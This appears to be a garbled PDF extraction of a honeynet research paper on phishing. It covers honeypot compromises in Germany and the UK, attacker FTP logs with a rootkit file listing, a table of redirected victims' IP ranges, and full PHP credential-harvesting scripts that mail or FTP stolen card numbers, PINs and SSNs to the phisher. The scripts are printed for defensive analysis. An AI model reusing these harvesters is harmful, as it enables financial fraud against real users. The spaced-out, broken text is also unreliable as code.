1 0S e p1 62 0 0 3m a s s 2 . t a r . g z d r w x r x r x2f t p u s e rw e b5 1 2A u g2 01 4 : 0 0m u i e r w r r -1f t p u s e rw e b1 2 7 5 5J u n62 0 0 3p i z d a . t g z r w r r -1f t p u s e rw e b1 3 0 8 9 2J u n52 0 0 3s c r e e n . t g z r w r r -1f t p u s e rw e b0N o v1 11 0 : 3 9s p a m a s p . t g z r w r r -1f t p u s e rw e b1 0 3 3 2A u g1 12 0 0 3s s l s t o p . t a r . g z r w r r -1f t p u s e rw e b3 1 9 6 5O c t2 02 0 0 3s t r o b e . t g z d r w x r x r x2f t p u s e rw e b5 1 2A u g2 01 4 : 0 0s u p e r w u . t g z 2 2 6L i s t i n gc o m p l e t e d . c d. . >C W D. . 2 5 0" / "i sn e wc w d . c dc g i b i n >C W Dc g i b i n 2 5 0" / c g i b i n "i sn e wc w d . c dr o o t k y t >C W Dr o o t k y t 2 5 0" / c g i b i n / r o o t k y t "i sn e wc w d . g e ts u p e r w u . t g z l o c a l :s u p e r w u . t g zr e m o t e :s u p e r w u . t g z >T Y P EI 2 0 0T y p eo k a y . >P O R T2 1 2 , 4 4 , 1 6 1 , 1 1 5 , 9 , 1 4 0 2 0 0P O R Tc o m m a n ds u c c e s s f u l . >R E T Rs u p e r w u . t g z 1 5 0O p e n i n gB I N A R Ym o d ed a t ac o n n e c t i o nf o rs u p e r w u . t g z( 7 2 3 1 2 8b y t e s ) .

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 2 2 6T r a n s f e rc o m p l e t e d . b y e 7 2 3 1 2 8b y t e sr e c e i v e di n9 6 . 7s e c s( 7 . 3K b y t e s / s e c ) >Q U I T 2 2 1G o o d b y e . t a rx z v fs u p e r w u . t g z . n r / . n r / c r e a t e d i r . n r / f i r e w a l l . n r / s t a t u s . n r / c l e a n . n r / m a i l m e . n r / p a t c h . n r / r e m o v e . n r / r e p l a c e . n r / s t a r t f i l e . n r / i n i t . n r / s e n d m a i l / . n r / s e n d m a i l / s s h d _ c o n f i g . n r / s e n d m a i l / s s h _ h o s t _ k e y . n r / s e n d m a i l / s s h _ r a n d o m _ s e e d . n r / s e n d m a i l / s e n d m a i l . n r / c h a t t r . n r / d i r

. n r / d u . n r / e n c r y p t . n r / f i x . n r / i f c o n f i g . n r / k i l l a l l . n r / l i b p r o c . s o . 2 . 0 . 6 . n r / l o g i n . n r / l s . n r / l s o f . n r / m d 5 s u m . n r / n e t s t a t . n r / p s . n r / p s t r e e . n r / s o c k l i s t / . n r / s o c k l i s t / X f / . n r / s o c k l i s t / X f / f i x . c . n r / s o c k l i s t / X f / f i x . n r / s o c k l i s t / X f / c h a t t r . n r / s o c k l i s t / X f / s o c k l i s t x . c . n r / s o c k l i s t / X f / s o c k l i s t x . n r / s o c k l i s t / X f / m o v e . n r / s o c k l i s t / X f / s t r i n g s x . c . n r / s o c k l i s t / X f / s t r i n g s x . n r / s o c k l i s t / s o c k l i s t . n r / s o c k l i s t / u t i l s / . n r / s o c k l i s t / u t i l s / . s i z . c . n r / s o c k l i s t / u t i l s / s i z . n r / t o p . n r / v d i r . n r / l g . n r / . c . n r / . d . n r / . p . n r / w r i t e . n r / r e a d . n r / c l . n r / c u r a t a r e / . n r / c u r a t a r e / p s . n r / c u r a t a r e / p s t r e e . n r / c u r a t a r e / s s h d . n r / c u r a t a r e / c l e a n . n r / c u r a t a r e / c h a t t r . n r / c u r a t a r e / a t t r i b s e t u p . / s e t u p

German PHP script analysis
In this side note we analyse an example script that used to validate the information entered by users into a HTML form on a phishing web site. Initially the input data is checked to ensure that the submitted strings are valid. For example, the PIN should be four characters long and the username should not contain certain words. If the entered data passes this check, the script constructs an e-mail message containing the user's information and sends it to an address at a free e-mail provider. Finally, the location bar of the browser is updated to point to the file x x x x I S A P I . d l l (the file name has been obfuscated). This page will display a confirmation for the victim. In addition, a script was also included that could be used to transfer the phished information to an FTP server.
< ? p h p $ e r r c h k = 0 ; $ e r r o r=" N o n e " ; $ b a d w = " f u c kp u s s yd i c ks u c ka s s h o l e " ; / / C h e c k i n gf o re r r o r si nt h ep o s t : / / 1-C Cn r : i f ( s t r l e n ( $ c c n u m b e r ) < 1 6 ) { $ e r r o r = " I n v a l i dc r e d i tc a r dn u m b e r ,p l e a s er e s u b m i t . " ; $ e r r c h k = 1 ; } e l s ei f ( s t r l e n ( $ c c n u m b e r ) > 1 6 & & $ c c n u m b e r { 1 6 } ! = '' ) { $ e r r o r = " I n v a l i dc r e d i tc a r dn u m b e r ,p l e a s er e s u b m i t . " ; $ e r r c h k = 1 ; } / / 2-E m a i ls y n t a x : e l s ei f ( s t r s t r ( $ e m a i l ,' @ ' )= =F A L S E ) { $ e r r o r = " I n v a l i de m a i la d d r e s s ,p l e a s er e s u b m i t . " ; $ e r r c h k = 2 ; } / / 3-R o u t i n gn u m b e r( i fi td o e se x i s t ) e l s ei f ( s t r l e n ( $ b a n k r ) > 0& &s t r l e n ( $ b a n k r ) < 9 ) { $ e r r o r = " I n v a l i db a n kr o u t i n gn u m b e r ,p l e a s er e s u b m i t . " ; $ e r r c h k = 3 ; } / / 4-C V V 2c h e c k e l s ei f ( s t r l e n ( $ c v v 2 ) ! = 3 & & s t r l e n ( $ c v v 2 ) ! = 4 ) { $ e r r o r = " I n v a l i dc a r dv a l i d a t i o nc o d e ,p l e a s er e s u b m i t . " ; $ e r r c h k = 4 ; } / / 4-P I Nc h e c k e l s ei f ( s t r l e n ( $ c c p ) ! = 4 & & s t r l e n ( $ c c p ) ! = 4 ) { $ e r r o r = " I n v a l i dp i nn u m b e r ,p l e a s er e s u b m i t . " ; $ e r r c h k = 4 ; } / / 5f i e l d st h a ts h o u l de x i s t : e l s ei f ( s t r l e n ( $ u s e r n a m e ) < 1 ) { $ e r r o r = " P l e a s ee n t e ry o u rf u l ln a m ea n dr e s u b m i t . " ; $ e r r c h k = 5 ; } e l s ei f ( s t r l e n ( $ s t r e e t a d d r ) < 1 ) { $ e r r o r = " P l e a s ee n t e ry o u ra d d r e s sa n dr e s u b m i t . " ; $ e r r c h k = 5 ;

} e l s ei f ( s t r l e n ( $ c i t y a d d r ) < 1 ) { $ e r r o r = " P l e a s ee n t e ry o u rc i t ya n dr e s u b m i t . " ; $ e r r c h k = 5 ; } e l s ei f ( s t r l e n ( $ m m n ) < 1 ) { $ e r r o r = " P l e a s ee n t e ry o u rM o t h e rM a i d e nN a m ea n dr e s u b m i t . " ; $ e r r c h k = 5 ; } e l s ei f ( s t r l e n ( $ m o n t h ) < 1| |s t r l e n ( $ d a y ) < 1| |s t r l e n ( $ y e a r ) < 1) { $ e r r o r = " P l e a s ee n t e ry o u rD a t eO fB i r t ha n dr e s u b m i t . " ; $ e r r c h k = 5 ; } / / 6-B a dw o r d sc h e c k e l s ei f ( s t r i s t r ( $ b a d w , $ u s e r n a m e ) ) { $ e r r o r = " E R R O R-I n v a l i du s e rn a m eo rp a s s w o r d . " ; $ e r r c h k = 6 ; } e l s ei f ( s t r i s t r ( $ b a d w , $ s t r e e t a d d r ) ) { $ e r r o r = " E R R O R-I n v a l i du s e rn a m eo rp a s s w o r d . " ; $ e r r c h k = 6 ; } e l s ei f ( s t r i s t r ( $ b a d w , $ c i t y a d d r ) ) { $ e r r o r = " E R R O R-I n v a l i du s e rn a m eo rp a s s w o r d . " ; $ e r r c h k = 6 ; } e l s ei f ( s t r i s t r ( $ b a d w , $ m m n ) ) { $ e r r o r = " E R R O R-I n v a l i du s e rn a m eo rp a s s w o r d . " ; $ e r r c h k = 6 ; } / / M o r ec o m i n gs o o n : ) / / I fn oe r r o r : i f ( $ e r r c h k = = 0 ){ $ e f i l e = f o p e n ( " / t m p / U s e r . d o c " , " r " ) ; f s c a n f ( $ e f i l e , " % s " , $ u s e r i d ) ; f s c a n f ( $ e f i l e , " % s " , $ p a s s ) ; f c l o s e ( $ e f i l e ) ; $ t i m e d=d a t e( " ld So fFYh : i : sA " ) ; $ i p=$ _ S E R V E R [ " R E M O T E _ A D D R " ] ; $ m e s s a g e = " O n$ t i m e dt h eu s e r( $ i p )w r o t e : C r e d i t C a r dN u m b e r-$ c c n u m b e r;M o n t h-$ m o n t h;D a y-$ d a y;Y e a r-$ y e a r " ; $ m e s s a g e = $ m e s s a g e . " U s e r I d-$ u s e r i d " ; $ m e s s a g e = $ m e s s a g e . " P a s s w o r d-$ p a s s " ; $ m e s s a g e = $ m e s s a g e . " E m a i l-$ e m a i l " ; $ m e s s a g e = $ m e s s a g e . " E m a i lP a s s w o r d-$ e m a i l p " ; $ m e s s a g e = $ m e s s a g e . " F u l lN a m e-$ u s e r n a m e " ; $ m e s s a g e = $ m e s s a g e . " A d d r e s s-$ s t r e e t a d d r " ; $ m e s s a g e = $ m e s s a g e . " C i t y-$ c i t y a d d r " ; $ m e s s a g e = $ m e s s a g e . " S t a t e-$ s t a t e p r o v a d d r " ; $ m e s s a g e = $ m e s s a g e . " Z i pC o d e-$ z i p c o d e a d d r " ; $ m e s s a g e = $ m e s s a g e . " P h o n en u m b e r-$ p h o n e " ; $ m e s s a g e = $ m e s s a g e . " C o u n t r y-$ c o u n t r y a d d r " ; $ m e s s a g e = $ m e s s a g e . " C V V-$ c v v 2 " ; $ m e s s a g e = $ m e s s a g e . " B a n kN a m e-$ b a n k " ; $ m e s s a g e = $ m e s s a g e . " B a n kR o u t i n g#-$ b a n k r C h e c k i n gA c c o u n t#-$ b a n k c S o c i a lS e c u r i t yN u m b e r-$ s s n C a r dP I NN u m b e r-$ c c p M o t h e r ' sM a i d e nN a m e-$ m m n D a t eo fB i r t h-$ p i b i r t h d a t e m m$ p i b i r t h d a t e d d$ p i b i r t h d a t e y y D r i v e rL i c e n c eN u m b e r-$ d l n " ; m a i l( " x x x x x x @ h o t m a i l . c o m " , " x x E B A Y x x " , " $ m e s s a g e " , " F r o m : t z o n f i< x x x x x x @ x x x x x x . c o m > \ n " ) ; h e a d e r( " L o c a t i o n : x x x x I S A P I . d l l " ) ; / / $ m u i e=f o p e n ( " / t m p / e b . t x t " ," a " ) ; / / f w r i t e ( $ m u i e ,$ m e s s a g e ) ; / / f c l o s e ( $ m u i e ) ; / / i n c l u d e ( " c c f t p . p h p " ) ; e x i t ( ) ; } e l s e{ e c h o$ e r r o r ; } ? >

The script c c f t p . p h p(commented out in the data processing script above) will transfer the input to an FTP server:
< e m > & l t ; ? p h pi n c l u d e ( & q u o t ; r c o n f i g . p h p & q u o t ; ) ;< / e m > / /t h es e r v e rl o g i ni n f o r m a t i o n < e m > $ f c o n=f t p _ c o n n e c t ( $ h o s t ) ;i f ( @ f t p _ l o g i n ( $ f c o n ,$ u s e r , $ p a s s ) ){f t p _ p u t ( $ f c o n ,$ f r e m o t e ,$ f l o c a l ,F T P _ A S C I I ) ;}e l s e{$ m s g=& q u o t ; U n a b l et oc o n n e c tt oh o s t :$ h o s tw i t hu s e r :$ u s e ra n dp a s s :$ p a s s . P l e a s eu p d a t em e . & q u o t ; ;m a i l( & q u o t ; x x x x x x @ x x x x x x & q u o t ; , & q u o t ; F t p u p d a t e & q u o t ; , & q u o t ; $ m s g & q u o t ; , & q u o t ; F r o m : j m e k e r u & l t ; x x x x x x @ x x x x x x & g t ; \ n & q u o t ; ) ;}f t p _ c l o s e ( $ f c o n ) ;? & g t ; < / e m >

Redirected Phishing Victims
In this side note we provide an overview of the source IP addresses of potential victims in the redirection phishing attack described in phishing technique two. The data below was collected with

the help of the compromised German honeypot and modified redir software. Over a period of about 36 hours we observed 721 redirections of inbound HTTP requests to the honeypot, presumably recipients of a spam phishing email who were tricked into accessing the redirected content by clicking on the link provided. All are potential victims of the phishing attack, but as no personal data was captured we we cannot make an educated guess how many people actually entered sensitive information into the HTML form on the Chinese phishing web site. Count Source IP address range 28 16 13 12 9 9 8 8 8 7 5 5 5 5 4 4 4 4 4 4 4 3 3 3 3 3 3 3 3 3 3 3 3 2 2 2 2 2 2 2 2 2 2 2 2 2 2 203.186.X 80.58.X 212.138.X 195.175.X 61.56.X 213.42.X 62.220.X 200.141.X 195.229.X 200.207.X 200.226.X 200.171.X 142.32.X 133.11.X 61.19.X 219.249.X 203.162.X 203.113.X 202.129.X 201.6.X 200.204.X 82.129.X 66.173.X 65.214.X 216.189.X 212.0.X 211.248.X 202.175.X 200.168.X 200.153.X 193.95.X 193.188.X 163.28.X 81.192.X 81.168.X 81.116.X 80.55.X 80.53.X 69.56.X 68.167.X 67.163.X 66.6.X 66.250.X 66.207.X 66.135.X 64.139.X 63.70.X

2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 1 1 1 1 1 1

61.220.X 61.179.X 61.131.X 24.106.X 219.148.X 218.30.X 217.166.X 217.14.X 216.37.X 216.244.X 216.108.X 213.212.X 212.165.X 211.75.X 210.95.X 210.212.X 210.193.X 210.177.X 208.59.X 207.250.X 203.87.X 203.75.X 203.233.X 203.177.X 203.154.X 203.147.X 202.157.X 202.138.X 200.68.X 200.45.X 200.247.X 200.216.X 200.206.X 200.161.X 200.14.X 196.40.X 195.92.X 193.251.X 168.143.X 163.27.X 148.244.X 148.240.X 12.154.X 84.9.X 84.114.X 82.67.X 82.194.X 82.156.X 82.144.X 82.112.X

1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1

82.108.X 81.86.X 81.193.X 81.115.X 80.65.X 80.51.X 80.48.X 80.235.X 80.191.X 80.183.X 80.178.X 80.15.X 80.13.X 80.132.X 80.108.X 69.95.X 69.8.X 69.88.X 69.76.X 69.50.X 69.26.X 69.201.X 68.9.X 68.95.X 68.81.X 68.60.X 68.255.X 68.228.X 68.169.X 68.164.X 68.163.X 68.161.X 68.153.X 68.122.X 68.120.X 67.50.X 67.162.X 67.132.X 67.10.X 67.109.X 67.101.X 67.100.X 66.95.X 66.93.X 66.8.X 66.69.X 66.56.X 66.30.X 66.255.X 66.23.X

1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1

66.228.X 66.214.X 66.201.X 66.178.X 66.159.X 66.150.X 66.147.X 66.0.X 65.75.X 65.69.X 65.33.X 65.202.X 65.198.X 65.197.X 65.166.X 65.115.X 65.113.X 64.84.X 64.7.X 64.76.X 64.5.X 64.39.X 64.31.X 64.2.X 64.26.X 64.219.X 64.217.X 64.205.X 64.198.X 64.173.X 64.167.X 64.166.X 64.145.X 64.132.X 64.12.X 64.114.X 64.105.X 63.86.X 63.245.X 63.209.X 63.171.X 63.169.X 63.167.X 63.162.X 63.145.X 63.134.X 62.69.X 62.39.X 62.252.X 62.190.X

1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1

62.103.X 61.62.X 61.241.X 61.236.X 61.222.X 61.221.X 61.219.X 61.218.X 61.206.X 61.197.X 61.17.X 61.150.X 61.145.X 61.138.X 4.7.X 4.79.X 4.60.X 4.42.X 4.239.X 38.5.X 38.118.X 24.74.X 24.28.X 24.252.X 24.242.X 24.220.X 24.217.X 24.209.X 24.175.X 24.167.X 24.140.X 24.13.X 24.129.X 24.11.X 24.117.X 24.0.X 222.51.X 222.35.X 222.111.X 221.2.X 221.142.X 220.80.X 220.65.X 220.255.X 220.244.X 220.172.X 220.135.X 220.130.X 219.93.X 219.89.X

1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1

219.239.X 219.166.X 219.163.X 219.161.X 219.147.X 219.142.X 219.137.X 219.133.X 218.93.X 218.89.X 218.76.X 218.5.X 218.56.X 218.188.X 218.157.X 218.152.X 218.145.X 218.144.X 218.108.X 217.95.X 217.84.X 217.56.X 217.33.X 217.172.X 217.167.X 217.136.X 217.128.X 216.86.X 216.77.X 216.43.X 216.253.X 216.250.X 216.246.X 216.239.X 216.221.X 216.191.X 216.190.X 216.185.X 216.161.X 216.155.X 216.154.X 216.153.X 216.144.X 216.139.X 216.135.X 216.104.X 213.81.X 213.56.X 213.3.X 213.229.X

1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1

213.199.X 213.186.X 213.172.X 213.164.X 213.157.X 213.132.X 213.121.X 212.97.X 212.95.X 212.55.X 212.37.X 212.182.X 212.112.X 211.92.X 211.72.X 211.57.X 211.46.X 211.38.X 211.251.X 211.249.X 211.241.X 211.23.X 211.22.X 211.21.X 211.184.X 211.167.X 211.114.X 211.108.X 210.93.X 210.90.X 210.83.X 210.60.X 210.249.X 210.187.X 210.150.X 210.138.X 210.104.X 210.100.X 210.0.X 209.88.X 209.63.X 209.58.X 209.250.X 209.239.X 209.232.X 209.226.X 209.205.X 209.204.X 209.195.X 209.183.X

1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1

209.173.X 209.113.X 208.63.X 208.62.X 208.42.X 208.29.X 208.232.X 208.203.X 208.19.X 208.191.X 208.190.X 208.16.X 208.153.X 208.147.X 207.6.X 207.69.X 207.44.X 207.28.X 207.233.X 207.212.X 207.192.X 207.177.X 207.152.X 207.121.X 207.109.X 206.205.X 206.173.X 206.163.X 205.208.X 205.201.X 205.188.X 205.145.X 204.69.X 203.59.X 203.51.X 203.252.X 203.208.X 203.199.X 203.195.X 203.185.X 203.172.X 203.157.X 203.151.X 203.145.X 203.131.X 203.130.X 203.121.X 203.112.X 203.10.X

1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1

202.85.X 202.67.X 202.5.X 202.58.X 202.54.X 202.47.X 202.39.X 202.216.X 202.213.X 202.174.X 202.169.X 202.162.X 202.159.X 202.155.X 202.14.X 202.130.X 202.106.X 201.3.X 201.2.X 201.225.X 201.129.X 200.87.X 200.85.X 200.59.X 200.40.X 200.30.X 200.253.X 200.251.X 200.250.X 200.228.X 200.212.X 200.203.X 200.201.X 200.182.X 200.165.X 200.163.X 200.158.X 200.144.X 200.12.X 200.119.X 200.118.X 200.114.X 199.80.X 199.246.X 199.243.X 199.203.X 199.174.X 198.81.X 198.248.X 198.173.X

1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1

198.165.X 196.33.X 195.69.X 195.68.X 195.61.X 195.56.X 195.39.X 195.222.X 195.205.X 195.117.X 194.78.X 194.243.X 193.253.X 193.170.X 192.136.X 192.115.X 170.154.X 168.234.X 168.209.X 166.114.X 165.98.X 165.21.X 163.23.X 163.20.X 162.6.X 162.39.X 159.54.X 158.130.X 156.110.X 155.212.X 151.99.X 151.195.X 149.106.X 148.223.X 143.248.X 142.179.X 141.158.X 140.131.X 138.88.X 137.204.X 129.44.X 128.200.X 12.42.X 12.176.X 12.160.X 12.147.X 12.101.X

Details of UK compromise
Details about the UK compromise

Analysis
This honeynet was a high interaction research honeynet deployed by the UK Honeynet Project in a UK ISP data centre. After a few hours of general background network activity, the Redhat Linux 7.3 honeypot was scanned, compromised and an IRC server installed. A number of further compromises occurred, as multiple attackers located the vulnerable system and exploited it for their own purposes, before the honeypot server was used to host a phishing attack targeting a well known US bank. For brevity, this detailed analysis of the uploaded content only covers the activity relevant to the phishing attack. The first zip file downloaded was bank.zip, via wget from the Romanian FTP server host2.go.ro.
#m d 5 s u mb a n k . z i p 8 0 4 5 f d 2 4 4 f c 9 6 5 7 6 e 9 8 a 2 c 8 8 b 3 b 4 2 0 b 4 b a n k . z i p #l slb a n k . z i p r w r r 1r o o t r o o t 3 9 9 8 8J u l2 61 0 : 1 2b a n k . z i p #f i l eb a n k . z i p b a n k . z i p :Z i pa r c h i v ed a t a ,a tl e a s tv 2 . 0t oe x t r a c t

The file was a valid zip archive, and contained the following data:
L e n g t h D a t e T i m eN a m e -- 1 2 1 7 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / C o n n e c t i o n S e c u r e d . g i f 4 8 3 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / E n r o l l T o d a y . g i f 2 9 3 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / M e m b e r F D I C . g i f 4 7 5 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / T a k e A T o u r . g i f 2 5 0 8 8 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / T h u m b s . d b 5 1 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / a r r o w _ r e d . g i f 5 7 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / a r r o w _ r e d 2 . g i f 1 2 1 4 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / b b a r l e f t . g i f 1 3 1 8 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / b b a r m i d d l e . g i f 2 3 9 0 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / b b a r r i g h t . g i f 9 5 9 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / c o n v e r s i o n W e l c o m e . j s 2 2 2 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / f o o t e r _ c u r v e . g i f 4 5 2 7 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / g l o b a l . c s s 3 7 0 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / l o g i n . g i f 1 4 8 9 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / l o g o . g i f 1 0 5 1 9 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / l o g o n . j s 9 4 7 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / s h o w D e m o . j s 4 3 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / s p a c e r . g i f 5 8 3 0 2 0 2 0 40 3 : 4 8B a n k I n t e r n e t B a n k i n g f i l e s / t o p _ n a v . g i f 0 0 7 0 4 0 40 2 : 5 6B a n k I n t e r n e t B a n k i n g f i l e s / 1 7 5 2 0 7 0 4 0 40 3 : 1 9c h e c k . p h p 2 2 0 8 5 0 7 0 4 0 40 3 : 1 1i n d e x . h t m 1 4 1 2 0 7 0 4 0 40 3 : 1 4S c r i s o a r e . h t m l 7 7 4 9 4 2 3f i l e s

This was a pre-prepared web site that mimics the official login page for a major US bank. It included a server side PHP script called check.php, intended to harvest any credentials entered by an unsuspecting end user and email them to the phisher. The presence of a Thumbs.db file suggests that the contents was prepared on a MS Windows system. Scrisoare is the Romanian word for letter, suggesting an email or message or Romanian origin. Analysis of the check.php script (shown below) reveals that this script is a more advanced version of the script used the German phishing incident. Basic checks on the card number received have been added, along with a refinement that uses the credit card number to classify cards into different types and insert the type into the subject line of the email. This suggests basic scripting abilities and not just a simple script kiddie. The check.php script:
< ? p h p $ c c n u m b e r=$ _ P O S T [ ' c c n u m b e r ' ] ; $ c v v 2=$ _ P O S T [ ' c v v 2 ' ] ; $ a t m=$ _ P O S T [ ' a t m ' ] ; $ e x p m o n t h=$ _ P O S T [ ' e x p m o n t h ' ] ; $ e x p y e a r=$ _ P O S T [ ' e x p y e a r ' ] ; i f ( ! $ c c n u m b e r| |! $ c v v| |! $ a t m| |! $ e x p m o n t h| |! $ e x p y e a r ) { h e a d e r ( " L o c a t i o n :h t t p : / / 6 9 . 4 4 . X X X . X X X / . i n t e r n e t _ b a n k i n g _ l o g o n / R e q u e s t R o u t e r i f r e q u e s t C m d I d D i s p l a y L o g i n P a g e / i n d e x . h t m " ) ;} e l s e { i f ( ! e r e g ( " ^ [ 0 9 ] { 1 4 , 1 6 } " , $ c c n u m b e r ) ) { h e a d e r ( " L o c a t i o n :h t t p : / / 6 9 . 4 4 . X X X . X X X / . i n t e r n e t _ b a n k i n g _ l o g o n / R e q u e s t R o u t e r i f r e q u e s t C m d I d D i s p l a y L o g i n P a g e / i n d e x . h t m " ) ;} e l s e { i f ( ! e r e g ( " ^ [ 0 9 ] { 3 , 4 } " , $ c v v ) ) { h e a d e r ( " L o c a t i o n :h t t p : / / 6 9 . 4 4 . X X X . X X X / . i n t e r n e t _ b a n k i n g _ l o g o n / R e q u e s t R o u t e r i f r e q u e s t C m d I d D i s p l a y L o g i n P a g e / i n d e x . h t m " ) ;} e l s e { $ c o m i = " p h i s h e r @ x x x . u s " ; $ f r o m _ n a m e = " $ f i r s t$ l a s t " ; $ f r o m _ a d d r e s s = " C C @ t a r g e t b a n k . c o m " ; $ m e s a j=" C r e d i t C a r dN u m b e r:$ c c n u m b e r C V V 2:$ c v v P I N:$ a t m E x p i r a t i o nD a t e:$ e x p m o n t h-$ e x p y e a r " ; i f ( e r e g ( ' ^ 4 [ 0 9 ] { 1 3 , 1 7 } $ ' ,$ c c n u m b e r ) ) { m a i l ( $ c o m i ," B A N K[ V I S A] " ,$ m e s a j ," F r o m :< { $ f r o m _ a d d r e s s } > \ r \ n " ) ; } e l s e{} i f ( e r e g ( ' ^ 5 [ 0 9 ] { 1 3 , 1 7 } $ ' ,$ c c n u m b e r ) ) { m a i l ( $ c o m i ," B A N K[ M a s t e r C a r d] " ,$ m e s a j ," F r o m :< { $ f r o m _ a d d r e s s } > \ r \ n " ) ; } e l s e{} i f ( e r e g ( ' ^ 3 [ 0 9 ] { 1 3 , 1 7 } $ ' ,$ c c n u m b e r ) ) {m a i l ( $ c o m i ," B A N K[ A m e r i c a nE x p r e s s] " ,$ m e s a j ," F r o m :< { $ f r o m _ a d d r e s s } > \ r \ n " ) ; } e l s e{} i f ( e r e g ( ' ^ 6 [ 0 9 ] { 1 3 , 1 7 } $ ' ,$ c c n u m b e r ) ) { m a i l ( $ c o m i ," B A N K[ D i s c o v e r] " ,$ m e s a j ," F r o m :< { $ f r o m _ a d d r e s s } > \ r \ n " ) ; } e l s e{} e c h o" < h t m l > < b o d y >

< s c r i p tl a n g u a g e = ' j a v a s c r i p t ' > w i n d o w . l o c a t i o n = ' h t t p s : / / w w w . t a r g e t b a n k . c o m / i n t e r n e t B a n k i n g / R e q u e s t R o u t e r ? r e q u e s t C m d I d = D i s p l a y L o g i n P a g e ' ; < / s c r i p t > & l t ; / h t m l & g t ; " ; } } } ? >

A hard coded IP address of 66.XXX.XXX.XXX was included in the original script, suggesting that the script had already been used on an alternate server (either another compromised host or a test machine local to the attacker). This IP address appears to be a home DSL IP block belonging to a US carrier and no web site is hosted there now. This script also links directly to the real target bank web site, presumably for added realism and to attempt to confuse recipients. The second file downloaded using FTP was bank1.tgz:
#f i l eb a n k 1 . t g z b a n k 1 . t g z :g z i pc o m p r e s s e dd a t a ,f r o mU n i x #m d 5 s u mb a n k 1 . t g z 3 6 a e 1 2 d c c 6 d 3 6 b 5 5 f 5 2 8 9 4 6 4 e 0 9 2 a 4 5 eb a n k 1 . t g z #l slb a n k 1 . t g z r w r r 1r o o t r o o t3 6 0 6 5A u g 21 0 : 0 9b a n k 1 . t g z

The file was a valid tgz archive, and contained the following data:
. / b a n k . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s / C o n n e c t i o n S e c u r e d . g i f . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s / E n r o l l T o d a y . g i f . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s / M e m b e r F D I C . g i f . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s / T a k e A T o u r . g i f . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s / T h u m b s . d b . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s / a r r o w _ r e d . g i f . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s / a r r o w _ r e d 2 . g i f . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s / b b a r l e f t . g i f . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s / b b a r m i d d l e . g i f . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s / b b a r r i g h t . g i f . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s / c o n v e r s i o n W e l c o m e . j s . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s / f o o t e r _ c u r v e . g i f . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s / g l o b a l . c s s . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s / l o g i n . g i f . / b a n k / B a n k I n t e r n e t B a n k i n g f i l e s / l o g o . g i f . / b a n k / B a n k I n t e r n 